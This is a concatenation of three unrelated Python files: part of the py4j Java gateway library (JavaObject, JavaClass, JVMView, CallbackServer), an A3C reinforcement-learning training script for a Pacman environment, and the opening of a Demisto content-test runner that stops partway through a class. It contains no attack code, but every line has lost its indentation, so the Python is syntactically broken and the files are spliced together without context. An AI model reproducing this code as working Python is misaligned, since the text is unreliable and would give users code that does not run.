def __getattr__(self, name):
if name == "__call__":
# Provide an explicit definition for __call__ so that a JavaMember
# does not get created for it. This serves two purposes:
# 1) IPython (and others?) stop showing incorrect help indicating
# that this is callable
# 2) A TypeError(object not callable) is raised if someone does try
# to call here
raise AttributeError
if name not in self._methods:
if (self._auto_field):
(is_field, return_value) = self._get_field(name)
if (is_field):
self._field_names.add(name)
return return_value
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
self._methods[name] = JavaMember(
name, self, self._target_id, self._gateway_client)
# The name is a method
return self._methods[name]
def __dir__(self):
self._populate_fields()
return list(set(self._methods.keys()) | self._field_names)
def _populate_fields(self):
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
if not self._fully_populated:
if self._auto_field:
command = proto.DIR_COMMAND_NAME +\
proto.DIR_FIELDS_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._target_id, "__dir__")
self._field_names.update(return_value.split("\n"))
command = proto.DIR_COMMAND_NAME +\
proto.DIR_METHODS_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._target_id, "__dir__")
names = return_value.split("\n")
for name in names:
if name not in self._methods:
self._methods[name] = JavaMember(
name, self, self._target_id, self._gateway_client)
self._fully_populated = True
def _get_field(self, name):
command = proto.FIELD_COMMAND_NAME +\
proto.FIELD_GET_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
name + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if answer == proto.NO_MEMBER_COMMAND or is_error(answer)[0]:
return (False, None)
else:
return_value = get_return_value(
answer, self._gateway_client, self._target_id, name)
return (True, return_value)
def __eq__(self, other):
if other is None:
return False
elif (hasattr2(other, "_get_object_id")):
return self.equals(other)
else:
return other.__eq__(self)
def __hash__(self):
return self.hashCode()
def __str__(self):
return self.toString()
def __repr__(self):
# For now...
return "JavaObject id=" + self._target_id
class JavaClass(object):
"""A `JavaClass` represents a Java Class from which static members can be
retrieved. `JavaClass` instances are also needed to initialize an array.
Usually, `JavaClass` are not initialized using their constructor, but
they are created while accessing the `jvm` property of a gateway, e.g.,
`gateway.jvm.java.lang.String`.
"""
def __init__(self, fqn, gateway_client):
self._fqn = fqn
self._gateway_client = gateway_client
self._pool = self._gateway_client.gateway_property.pool
self._command_header = fqn + "\n"
self._converters = self._gateway_client.converters
self._gateway_doc = None
self._statics = None
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self._gateway_client, self, display=False)
return self._gateway_doc
def __dir__(self):
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
if self._statics is None:
command = proto.DIR_COMMAND_NAME +\
proto.DIR_STATIC_SUBCOMMAND_NAME +\
self._fqn + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._fqn, "__dir__")
self._statics = return_value.split("\n")
return self._statics[:]
def __getattr__(self, name):
if name in ["__str__", "__repr__"]:
raise AttributeError
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_MEMBER_SUB_COMMAND_NAME +\
self._fqn + "\n" +\
name + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if len(answer) > 1 and answer[0] == proto.SUCCESS:
if answer[1] == proto.METHOD_TYPE:
return JavaMember(
name, None, proto.STATIC_PREFIX + self._fqn,
self._gateway_client)
elif answer[1].startswith(proto.CLASS_TYPE):
return JavaClass(
self._fqn + "$" + name, self._gateway_client)
else:
return get_return_value(
answer, self._gateway_client, self._fqn, name)
else:
raise Py4JError(
"{0}.{1} does not exist in the JVM".format(self._fqn, name))
def _get_args(self, args):
temp_args = []
new_args = []
for arg in args:
if not isinstance(arg, JavaObject):
for converter in self._converters:
if converter.can_convert(arg):
temp_arg = converter.convert(arg, self._gateway_client)
temp_args.append(temp_arg)
new_args.append(temp_arg)
break
else:
new_args.append(arg)
else:
new_args.append(arg)
return (new_args, temp_args)
def __call__(self, *args):
# TODO Refactor to use a mixin shared by JavaMember and JavaClass
if self._converters is not None and len(self._converters) > 0:
(new_args, temp_args) = self._get_args(args)
else:
new_args = args
temp_args = []
args_command = "".join(
[get_command_part(arg, self._pool) for arg in new_args])
command = proto.CONSTRUCTOR_COMMAND_NAME +\
self._command_header +\
args_command +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, None, self._fqn)
for temp_arg in temp_args:
temp_arg._detach()
return return_value
class UserHelpAutoCompletion(object):
"""
Type a package name or a class name.
For example with a JVMView called view:
>>> o = view.Object() # create a java.lang.Object
>>> random = view.jvm.java.util.Random() # create a java.util.Random
The default JVMView is in the gateway and is called:
>>> gateway.jvm
By default, java.lang.* is available in the view. To
add additional Classes/Packages, do:
>>> from py4j.java_gateway import java_import
>>> java_import(gateway.jvm, "com.example.Class1")
>>> instance = gateway.jvm.Class1()
Package and class completions are only available for
explicitly imported Java classes. For example, if you
java_import(gateway.jvm, "com.example.Class1")
then Class1 will appear in the completions.
"""
KEY = "<package or class name>"
class JavaPackage(object):
"""A `JavaPackage` represents part of a Java package from which Java
classes can be accessed.
Usually, `JavaPackage` are not initialized using their constructor, but
they are created while accessing the `jvm` property of a gateway, e.g.,
`gateway.jvm.java.lang`.
"""
def __init__(self, fqn, gateway_client, jvm_id=None):
self._fqn = fqn
self._gateway_client = gateway_client
if jvm_id is None:
self._jvm_id = proto.DEFAULT_JVM_ID
self._jvm_id = jvm_id
def __dir__(self):
return [UserHelpAutoCompletion.KEY]
def __getattr__(self, name):
if name == UserHelpAutoCompletion.KEY:
return UserHelpAutoCompletion
if name in ["__str__", "__repr__"]:
raise AttributeError
if name == "__call__":
raise Py4JError("Trying to call a package.")
new_fqn = self._fqn + "." + name
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME +\
new_fqn + "\n" +\
self._jvm_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if answer == proto.SUCCESS_PACKAGE:
return JavaPackage(new_fqn, self._gateway_client, self._jvm_id)
elif answer.startswith(proto.SUCCESS_CLASS):
return JavaClass(
answer[proto.CLASS_FQN_START:], self._gateway_client)
else:
raise Py4JError("{0} does not exist in the JVM".format(new_fqn))
class JVMView(object):
"""A `JVMView` allows access to the Java Virtual Machine of a
`JavaGateway`.
This can be used to reference static members (fields and methods) and
to call constructors.
"""
def __init__(self, gateway_client, jvm_name, id=None, jvm_object=None):
self._gateway_client = gateway_client
self._jvm_name = jvm_name
if id is not None:
self._id = id
elif jvm_object is not None:
self._id = proto.REFERENCE_TYPE + jvm_object._get_object_id()
# So that both JVMView instances (on Python and Java) have the
# same lifecycle. Theoretically, JVMView could inherit from
# JavaObject, but I would like to avoid the use of reflection
# for regular Py4J classes.
self._jvm_object = jvm_object
self._dir_sequence_and_cache = (None, [])
def __dir__(self):
command = proto.DIR_COMMAND_NAME +\
proto.DIR_JVMVIEW_SUBCOMMAND_NAME +\
self._id + "\n" +\
get_command_part(self._dir_sequence_and_cache[0]) + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._fqn, "__dir__")
if return_value is not None:
result = return_value.split("\n")
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
self._dir_sequence_and_cache = (
result[0], result[1:] + [UserHelpAutoCompletion.KEY])
return self._dir_sequence_and_cache[1][:]
def __getattr__(self, name):
if name == UserHelpAutoCompletion.KEY:
return UserHelpAutoCompletion()
answer = self._gateway_client.send_command(
proto.REFLECTION_COMMAND_NAME +
proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME + name + "\n" + self._id +
"\n" + proto.END_COMMAND_PART)
if answer == proto.SUCCESS_PACKAGE:
return JavaPackage(name, self._gateway_client, jvm_id=self._id)
elif answer.startswith(proto.SUCCESS_CLASS):
return JavaClass(
answer[proto.CLASS_FQN_START:], self._gateway_client)
else:
raise Py4JError("{0} does not exist in the JVM".format(name))
class GatewayProperty(object):
"""Object shared by callbackserver, gateway, and connections.
"""
def __init__(self, auto_field, pool):
self.auto_field = auto_field
self.pool = pool
class JavaGateway(object):
"""A `JavaGateway` is the main interaction point between a Python VM and
a JVM.
* A `JavaGateway` instance is connected to a `Gateway` instance on the
Java side.
* The `entry_point` field of a `JavaGateway` instance is connected to
the `Gateway.entryPoint` instance on the Java side.
* The `jvm` field of `JavaGateway` enables user to access classes, static
members (fields and methods) and call constructors.
Methods that are not defined by `JavaGateway` are always redirected to
`entry_point`. For example, ``gateway.doThat()`` is equivalent to
``gateway.entry_point.doThat()``. This is a trade-off between convenience
and potential confusion.
"""
def __init__(
self, gateway_client=None, auto_field=False,
python_proxy_port=DEFAULT_PYTHON_PROXY_PORT,
start_callback_server=False, auto_convert=False, eager_load=False,
gateway_parameters=None, callback_server_parameters=None):
"""
:param gateway_parameters: An instance of `GatewayParameters` used to
configure the various options of the gateway.
:param callback_server_parameters: An instance of
`CallbackServerParameters` used to configure various options of the
gateway server. Must be provided to start a gateway server.
Otherwise, callbacks won"t be available.
"""
self.gateway_parameters = gateway_parameters
if not gateway_parameters:
self.gateway_parameters = GatewayParameters(
auto_field=auto_field, auto_convert=auto_convert,
eager_load=eager_load)
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
# No parameters were provided so do not autostart callback server.
self.callback_server_parameters = CallbackServerParameters(
port=python_proxy_port, eager_load=False)
# Check for deprecation warnings
if auto_field:
deprecated("JavaGateway.auto_field", "1.0", "GatewayParameters")
if auto_convert:
deprecated("JavaGateway.auto_convert", "1.0", "GatewayParameters")
if eager_load:
deprecated("JavaGateway.eager_load", "1.0", "GatewayParameters")
if start_callback_server:
deprecated(
"JavaGateway.start_callback_server and python_proxy_port",
"1.0", "CallbackServerParameters")
self.callback_server_parameters.eager_load = True
if gateway_client:
deprecated("JavaGateway.gateway_client", "1.0",
"GatewayParameters")
else:
gateway_client = GatewayClient(
address=self.gateway_parameters.address,
port=self.gateway_parameters.port,
auto_close=self.gateway_parameters.auto_close)
self.gateway_property = GatewayProperty(
self.gateway_parameters.auto_field, PythonProxyPool())
self._python_proxy_port = python_proxy_port
# Setup gateway client
self.set_gateway_client(gateway_client)
# Setup callback server property
self._callback_server = None
if self.gateway_parameters.eager_load:
self._eager_load()
if self.callback_server_parameters.eager_load:
self.start_callback_server(self.callback_server_parameters)
def set_gateway_client(self, gateway_client):
"""Sets the gateway client for this JavaGateway. This sets the
appropriate gateway_property and resets the main jvm view (self.jvm).
This is for advanced usage only. And should only be set before the
gateway is loaded.
"""
if self.gateway_parameters.auto_convert:
gateway_client.converters = proto.INPUT_CONVERTER
else:
gateway_client.converters = None
gateway_client.gateway_property = self.gateway_property
self._gateway_client = gateway_client
self.entry_point = JavaObject(
proto.ENTRY_POINT_OBJECT_ID, self._gateway_client)
self.jvm = JVMView(
self._gateway_client, jvm_name=proto.DEFAULT_JVM_NAME,
id=proto.DEFAULT_JVM_ID)
def __getattr__(self, name):
return self.entry_point.__getattr__(name)
def _eager_load(self):
try:
self.jvm.System.currentTimeMillis()
except Exception:
self.shutdown()
raise
def start_callback_server(self, callback_server_parameters=None):
"""Starts the callback server.
:param callback_server_parameters: parameters to use to start the
server. If not provided, it will use the gateway callback server
parameters.
:rtype: Returns True if the server was started by this call or False if
it was already started (you cannot have more than one started
callback server).
"""
if self._callback_server:
return False
if not callback_server_parameters:
callback_server_parameters = self.callback_server_parameters
self._callback_server = CallbackServer(
self.gateway_property.pool, self._gateway_client,
callback_server_parameters=callback_server_parameters)
try:
self._callback_server.start()
except Py4JNetworkError:
# Clean up ourselves before raising the exception.
self.shutdown()
self._callback_server = None
raise
return True
def new_jvm_view(self, name="custom jvm"):
"""Creates a new JVM view with its own imports. A JVM view ensures
that the import made in one view does not conflict with the import
of another view.
Generally, each Python module should have its own view (to replicate
Java behavior).
:param name: Optional name of the jvm view. Does not need to be
unique, i.e., two distinct views can have the same name
(internally, they will have a distinct id).
:rtype: A JVMView instance (same class as the gateway.jvm instance).
"""
command = proto.JVMVIEW_COMMAND_NAME +\
proto.JVM_CREATE_VIEW_SUB_COMMAND_NAME +\
get_command_part(name) +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
java_object = get_return_value(answer, self._gateway_client)
return JVMView(
gateway_client=self._gateway_client, jvm_name=name,
jvm_object=java_object)
def new_array(self, java_class, *dimensions):
"""Creates a Java array of type `java_class` of `dimensions`
:param java_class: The :class:`JavaClass` instance representing the
type of the array.
:param dimensions: A list of dimensions of the array. For example
`[1,2]` would produce an `array[1][2]`.
:rtype: A :class:`JavaArray <py4j.java_collections.JavaArray>`
instance.
"""
if len(dimensions) == 0:
raise Py4JError("new arrays must have at least one dimension")
command = proto.ARRAY_COMMAND_NAME +\
proto.ARRAY_CREATE_SUB_COMMAND_NAME +\
get_command_part(java_class._fqn)
for dimension in dimensions:
command += get_command_part(dimension)
command += proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return get_return_value(answer, self._gateway_client)
def shutdown(self, raise_exception=False):
"""Shuts down the :class:`GatewayClient` and the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`.
:param raise_exception: If `True`, raise an exception if an error
occurs while shutting down (very likely with sockets).
"""
try:
self._gateway_client.shutdown_gateway()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while shutting down callback server",
exc_info=True)
self.shutdown_callback_server()
def shutdown_callback_server(self, raise_exception=False):
"""Shuts down the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`.
:param raise_exception: If `True`, raise an exception if an error
occurs while shutting down (very likely with sockets).
"""
try:
self._callback_server.shutdown()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while shutting down callback server",
exc_info=True)
def restart_callback_server(self):
"""Shuts down the callback server (if started) and restarts a new one.
"""
self.shutdown_callback_server()
self._callback_server = None
self.start_callback_server(self.callback_server_parameters)
def close(self, keep_callback_server=False):
"""Closes all gateway connections. A connection will be reopened if
necessary (e.g., if a :class:`JavaMethod` is called).
:param keep_callback_server: if `True`, the callback server is not
shut down.
"""
self._gateway_client.close()
if not keep_callback_server:
self.shutdown_callback_server()
def detach(self, java_object):
"""Makes the Java Gateway dereference this object.
The equivalent of this method is called when a JavaObject instance
is garbage collected on the Python side. This method, or gc.collect()
should still be invoked when memory is limited or when too many objects
are created on the Java side.
:param java_object: The JavaObject instance to dereference (free) on
the Java side.
"""
java_object._detach()
def help(self, var, pattern=None, short_name=True, display=True):
"""Displays a help page about a class or an object.
:param var: JavaObject, JavaClass or JavaMember for which a help page
will be generated.
:param pattern: Star-pattern used to filter the members. For example
"get\*Foo" may return getMyFoo, getFoo, getFooBar, but not
bargetFoo. The pattern is matched against the entire signature.
To match only the name of a method, use "methodName(\*".
:param short_name: If True, only the simple name of the parameter
types and return types will be displayed. If False, the fully
qualified name of the types will be displayed.
:param display: If True, the help page is displayed in an interactive
page similar to the `help` command in Python. If False, the page is
returned as a string.
"""
return gateway_help(
self._gateway_client, var, pattern, short_name, display)
@classmethod
def launch_gateway(
cls, port=0, jarpath="", classpath="", javaopts=[],
die_on_exit=False, redirect_stdout=None,
redirect_stderr=None, daemonize_redirect=False):
"""Launch a `Gateway` in a new Java process and create a default
:class:`JavaGateway <py4j.java_gateway.JavaGateway>` to connect to
it.
See :func:`launch_gateway <py4j.java_gateway.launch_gateway>` for more
information about this function.
:param port: the port to launch the Java Gateway on. If no port is
specified then an ephemeral port is used.
:param jarpath: the path to the Py4J jar. Only necessary if the jar
was installed at a non-standard location or if Python is using
a different `sys.prefix` than the one that Py4J was installed
under.
:param classpath: the classpath used to launch the Java Gateway.
:param javaopts: an array of extra options to pass to Java (the
classpath should be specified using the `classpath` parameter,
not `javaopts`.)
:param die_on_exit: if `True`, the Java gateway process will die when
this Python process exits or is killed.
:param redirect_stdout: where to redirect the JVM stdout.
If None (default)
stdout is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param redirect_stderr: where to redirect the JVM stdout.
If None (default)
stderr is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param daemonize_redirect: if True, the consumer threads will be
daemonized and will not prevent the main Python process from
exiting. This means the file descriptors (stderr, stdout,
redirect_stderr, redirect_stdout) might not be properly closed.
This is not usually a problem, but the default is conservatively
set to False.
:rtype: a :class:`JavaGateway <py4j.java_gateway.JavaGateway>`
connected to the `Gateway` server.
"""
_port = launch_gateway(
port, jarpath, classpath, javaopts, die_on_exit,
redirect_stdout=redirect_stdout, redirect_stderr=redirect_stderr,
daemonize_redirect=daemonize_redirect)
gateway = JavaGateway(gateway_parameters=GatewayParameters(port=_port))
return gateway
# CALLBACK SPECIFIC
class CallbackServer(object):
"""The CallbackServer is responsible for receiving call back connection
requests from the JVM. Usually connections are reused on the Java side,
but there is at least one connection per concurrent thread.
"""
def __init__(
self, pool, gateway_client, port=DEFAULT_PYTHON_PROXY_PORT,
address=DEFAULT_ADDRESS, callback_server_parameters=None):
"""
:param pool: the pool responsible of tracking Python objects passed to
the Java side.
:param gateway_client: the gateway client used to call Java objects.
:param callback_server_parameters: An instance of
`CallbackServerParameters` used to configure various options of the
callback server.
"""
self.gateway_client = gateway_client
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
deprecated(
"CallbackServer.port and address", "1.0",
"CallbackServerParameters")
self.callback_server_parameters = CallbackServerParameters(
address=address, port=port)
self.port = self.callback_server_parameters.port
self.address = self.callback_server_parameters.address
self.pool = pool
self.connections = []
# Lock is used to isolate critical region like connection creation.
# Some code can produce exceptions when ran in parallel, but
# They will be caught and dealt with.
self.lock = RLock()
self.is_shutdown = False
def start(self):
"""Starts the CallbackServer. This method should be called by the
client instead of run()."""
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
self.server_socket.bind((self.address, self.port))
except Exception as e:
msg = "An error occurred while trying to start the callback server"
logger.exception(msg)
raise Py4JNetworkError(msg, e)
# Maybe thread needs to be cleanup up?
self.thread = Thread(target=self.run)
# Default is False
self.thread.daemon = self.callback_server_parameters.daemonize
self.thread.start()
def run(self):
"""Starts listening and accepting connection requests.
This method is called when invoking `CallbackServer.start()`. A
CallbackServer instance is created and started automatically when
a :class:`JavaGateway <py4j.java_gateway.JavaGateway>` instance is
created.
"""
try:
with self.lock:
self.is_shutdown = False
logger.info("Callback Server Starting")
self.server_socket.listen(5)
logger.info(
"Socket listening on {0}".
format(smart_decode(self.server_socket.getsockname())))
read_list = [self.server_socket]
while not self.is_shutdown:
readable, writable, errored = select.select(
read_list, [], [], DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT)
if self.is_shutdown:
break
for s in readable:
socket_instance, _ = self.server_socket.accept()
input = socket_instance.makefile("rb", 0)
connection = CallbackConnection(
self.pool, input, socket_instance, self.gateway_client,
self.callback_server_parameters)
with self.lock:
if not self.is_shutdown:
self.connections.append(connection)
connection.start()
else:
quiet_shutdown(connection.socket)
quiet_close(connection.socket)
except Exception:
if self.is_shutdown:
logger.info("Error while waiting for a connection.")
else:
logger.exception("Error while waiting for a connection.")
def shutdown(self):
"""Stops listening and accepting connection requests. All live
connections are closed.
This method can safely be called by another thread.
"""
logger.info("Callback Server Shutting Down")
with self.lock:
self.is_shutdown = True
quiet_shutdown(self.server_socket)
quiet_close(self.server_socket)
self.server_socket = None
for connection in self.connections:
quiet_shutdown(connection.socket)
quiet_close(connection.socket)
self.pool.clear()
self.thread.join()
self.thread = None
class CallbackConnection(Thread):
"""A `CallbackConnection` receives callbacks and garbage collection
requests from the Java side.
"""
def __init__(
self, pool, input, socket_instance, gateway_client,
callback_server_parameters):
super(CallbackConnection, self).__init__()
self.pool = pool
self.input = input
self.socket = socket_instance
self.gateway_client = gateway_client
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
self.callback_server_parameters = CallbackServerParameters()
self.daemon = self.callback_server_parameters.daemonize_connections
def run(self):
logger.info("Callback Connection ready to receive messages")
try:
while True:
command = smart_decode(self.input.readline())[:-1]
obj_id = smart_decode(self.input.readline())[:-1]
logger.info(
"Received command {0} on object id {1}".
format(command, obj_id))
if obj_id is None or len(obj_id.strip()) == 0:
break
if command == proto.CALL_PROXY_COMMAND_NAME:
return_message = self._call_proxy(obj_id, self.input)
self.socket.sendall(return_message.encode("utf-8"))
elif command == proto.GARBAGE_COLLECT_PROXY_COMMAND_NAME:
self.input.readline()
del(self.pool[obj_id])
else:
logger.error("Unknown command {0}".format(command))
except Exception:
# This is a normal exception...
logger.info(
"Error while callback connection was waiting for"
"a message", exc_info=True)
logger.info("Closing down connection")
quiet_shutdown(self.socket)
quiet_close(self.socket)
def _call_proxy(self, obj_id, input):
return_message = proto.ERROR_RETURN_MESSAGE
if obj_id in self.pool:
try:
method = smart_decode(input.readline())[:-1]
params = self._get_params(input)
return_value = getattr(self.pool[obj_id], method)(*params)
return_message = "y" +\
get_command_part(return_value, self.pool)
except Exception:
logger.exception("There was an exception while executing the "
"Python Proxy on the Python Side.")
return return_message
def _get_params(self, input):
params = []
temp = smart_decode(input.readline())[:-1]
while temp != proto.END:
param = get_return_value("y" + temp, self.gateway_client)
params.append(param)
temp = smart_decode(input.readline())[:-1]
return params
class PythonProxyPool(object):
"""A `PythonProxyPool` manages proxies that are passed to the Java side.
A proxy is a Python class that implements a Java interface.
A proxy has an internal class named `Java` with a member named
`implements` which is a list of fully qualified names (string) of the
implemented interfaces.
The `PythonProxyPool` implements a subset of the dict interface:
`pool[id]`, `del(pool[id])`, `pool.put(proxy)`, `pool.clear()`,
`id in pool`, `len(pool)`.
The `PythonProxyPool` is thread-safe.
"""
def __init__(self):
self.lock = RLock()
self.dict = {}
self.next_id = 0
def put(self, object):
"""Adds a proxy to the pool.
:param object: The proxy to add to the pool.
:rtype: A unique identifier associated with the object.
"""
with self.lock:
id = proto.PYTHON_PROXY_PREFIX + smart_decode(self.next_id)
self.next_id += 1
self.dict[id] = object
return id
def __getitem__(self, key):
with self.lock:
return self.dict[key]
def __delitem__(self, key):
with self.lock:
del(self.dict[key])
def clear(self):
with self.lock:
self.dict.clear()
def __contains__(self, key):
with self.lock:
return key in self.dict
def __len__(self):
with self.lock:
return len(self.dict)
# Basic registration
register_output_converter(
proto.REFERENCE_TYPE,
lambda target_id, gateway_client: JavaObject(target_id, gateway_client))
if PY4J_SKIP_COLLECTIONS not in os.environ or\
os.environ[PY4J_SKIP_COLLECTIONS].lower() not in PY4J_TRUE:
__import__("py4j.java_collections")
|
train.py
|
"""
@author: Viet Nguyen <nhviet1009@gmail.com>
"""
import os
os.environ['OMP_NUM_THREADS'] = '1'
import argparse
import torch
from src.env import create_train_env
from src.model import Mnih2016ActorCritic
AC_NN_MODEL = Mnih2016ActorCritic
from src.optimizer import GlobalRMSProp
from src.process import local_train, local_test
import torch.multiprocessing as _mp
import shutil
def get_args():
parser = argparse.ArgumentParser(
"""Implementation of model described in the paper: Asynchronous Methods for Deep Reinforcement Learning for Super Mario Bros""")
parser.add_argument("--layout", type=str, default=None)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gamma', type=float, default=0.9, help='discount factor for rewards')
parser.add_argument('--tau', type=float, default=1.0, help='parameter for GAE')
parser.add_argument('--beta', type=float, default=0.01, help='entropy coefficient')
parser.add_argument("--num_local_steps", type=int, default=50)
parser.add_argument("--num_global_steps", type=int, default=5e6)
parser.add_argument("--num_processes", type=int, default=2)
parser.add_argument("--save_interval", type=int, default=50, help="Number of steps between savings")
parser.add_argument("--max_actions", type=int, default=200, help="Maximum repetition steps in test phase")
parser.add_argument("--log_path", type=str, default="tensorboard/a3c_super_mario_bros")
parser.add_argument("--saved_path", type=str, default="trained_models")
parser.add_argument("--load_previous_weights", type=bool, default=True,
help="Load weight from previous trained stage")
parser.add_argument("--use_gpu", type=bool, default=True)
args = parser.parse_args()
return args
def train(opt):
torch.manual_seed(123)
if os.path.isdir(opt.log_path):
shutil.rmtree(opt.log_path)
os.makedirs(opt.log_path)
if not os.path.isdir(opt.saved_path):
os.makedirs(opt.saved_path)
mp = _mp.get_context("spawn")
env, num_states, num_actions = create_train_env(opt.layout)
#global_model = ActorCritic(num_states, num_actions)
global_model = AC_NN_MODEL(num_states, num_actions)
if opt.use_gpu:
global_model.cuda()
global_model.share_memory()
if opt.load_previous_weights:
# if opt.stage == 1:
# previous_world = opt.world - 1
# previous_stage = 4
# else:
# previous_world = opt.world
# previous_stage = opt.stage - 1
file_ = "{}/gym-pacman_{}".format(opt.saved_path, opt.layout)
if os.path.isfile(file_):
print("Loading previous weights for %s..." %opt.layout, end=" ")
global_model.load_state_dict(torch.load(file_))
print("Done.")
else:
print("Can't load any previous weights for %s!" %opt.layout)
# print("Loading some other map...", end=" ")
# first_layout = "microGrid_superEasy1"
# file_ = "{}/gym-pacman_{}".format(opt.saved_path, first_layout)
# if os.path.isfile(file_):
# global_model.load_state_dict(torch.load(file_))
# print("Done.")
# else:
# print("Failed.")
#optimizer = GlobalAdam(global_model.parameters(), lr=opt.lr)
optimizer = GlobalRMSProp(global_model.parameters(), lr=opt.lr)
processes = []
for index in range(opt.num_processes):
# Multiprocessing async agents
if index == 0:
process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer, True))
else:
process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer))
process.start()
processes.append(process)
# Local test simulation
#process = mp.Process(target=local_test, args=(opt.num_processes, opt, global_model))
#process.start()
#processes.append(process)
for process in processes:
process.join()
if __name__ == "__main__":
opt = get_args()
train(opt)
|
test_content.py
|
from __future__ import print_function
import os
import re
import sys
import json
import time
import argparse
import threading
import subprocess
import traceback
from time import sleep
import datetime
from distutils.version import LooseVersion
import pytz
from google.cloud import storage
from google.api_core.exceptions import PreconditionFailed
from queue import Queue
from contextlib import contextmanager
import urllib3
import requests
import demisto_client.demisto_api
from demisto_client.demisto_api.rest import ApiException
from slackclient import SlackClient
from Tests.mock_server import MITMProxy, AMIConnection
from Tests.test_integration import Docker, test_integration, disable_all_integrations
from Tests.test_dependencies import get_used_integrations, get_tests_allocation_for_threads
from demisto_sdk.commands.common.constants import RUN_ALL_TESTS_FORMAT, FILTER_CONF, PB_Status
from demisto_sdk.commands.common.tools import print_color, print_error, print_warning, \
LOG_COLORS, str2bool
# Disable insecure warnings
urllib3.disable_warnings()
SERVER_URL = "https://{}"
INTEGRATIONS_CONF = "./Tests/integrations_file.txt"
FAILED_MATCH_INSTANCE_MSG = "{} Failed to run.\n There are {} instances of {}, please select one of them by using " \
"the instance_name argument in conf.json. The options are:\n{}"
SERVICE_RESTART_TIMEOUT = 300
SERVICE_RESTART_POLLING_INTERVAL = 5
LOCKS_PATH = 'content-locks'
BUCKET_NAME = os.environ.get('GCS_ARTIFACTS_BUCKET')
CIRCLE_BUILD_NUM = os.environ.get('CIRCLE_BUILD_NUM')
WORKFLOW_ID = os.environ.get('CIRCLE_WORKFLOW_ID')
CIRCLE_STATUS_TOKEN = os.environ.get('CIRCLECI_STATUS_TOKEN')
SLACK_MEM_CHANNEL_ID = 'CM55V7J8K'
def options_handler():
parser = argparse.ArgumentParser(description='Utility for batch action on incidents')
parser.add_argument('-k', '--apiKey', help='The Demisto API key for the server', required=True)
parser.add_argument('-s', '--server', help='The server URL to connect to')
parser.add_argument('-c', '--conf', help='Path to conf file', required=True)
parser.add_argument('-e', '--secret', help='Path to secret conf file')
parser.add_argument('-n', '--nightly', type=str2bool, help='Run nightly tests')
parser.add_argument('-t', '--slack', help='The token for slack', required=True)
parser.add_argument('-a', '--circleci', help='The token for circleci', required=True)
parser.add_argument('-b', '--buildNumber', help='The build number', required=True)
parser.add_argument('-g', '--buildName', help='The build name', required=True)
parser.add_argument('-i', '--isAMI', type=str2bool, help='is AMI build or not', default=False)
parser.add_argument('-m', '--memCheck', type=str2bool,
help='Should trigger memory checks or not. The slack channel to check the data is: '
'dmst_content_nightly_memory_data', default=False)
parser.add_argument('-d', '--serverVersion', help='Which server version to run the '
'tests on(Valid only when using AMI)', default="NonAMI")
parser.add_argument('-l', '--testsList', help='List of specific, comma separated'
'tests to run')
options = parser.parse_args()
tests_settings = TestsSettings(options)
return tests_settings
class TestsSettings:
def __init__(self, options):
self.api_key = options.apiKey
self.server = options.server
self.conf_path = options.conf
self.secret_conf_path = options.secret
self.nightly = options.nightly
self.slack = options.slack
self.circleci = options.circleci
self.buildNumber = options.buildNumber
self.buildName = options.buildName
self.isAMI = options.isAMI
self.memCheck = options.memCheck
self.serverVersion = options.serverVersion
self.serverNumericVersion = None
self.specific_tests_to_run = self.parse_tests_list_arg(options.testsList)
self.is_local_run = (self.server is not None)
@staticmethod
def parse_tests_list_arg(tests_list):
tests_to_run = tests_list.split(",") if tests_list else []
return tests_to_run
class PrintJob:
def __init__(self, message_to_print, print_function_to_execute, message_color=None):
self.print_function_to_execute = print_function_to_execute
self.message_to_print = message_to_print
self.message_color = message_color
def execute_print(self):
if self.message_color:
self.print_function_to_execute(self.message_to_print, self.message_color)
else:
self.print_function_to_execute(self.message_to_print)
class ParallelPrintsManager:
def __init__(self, number_of_threads):
self.threads_print_jobs = [[] for i in range(number_of_threads)]
self.print_lock = threading.Lock()
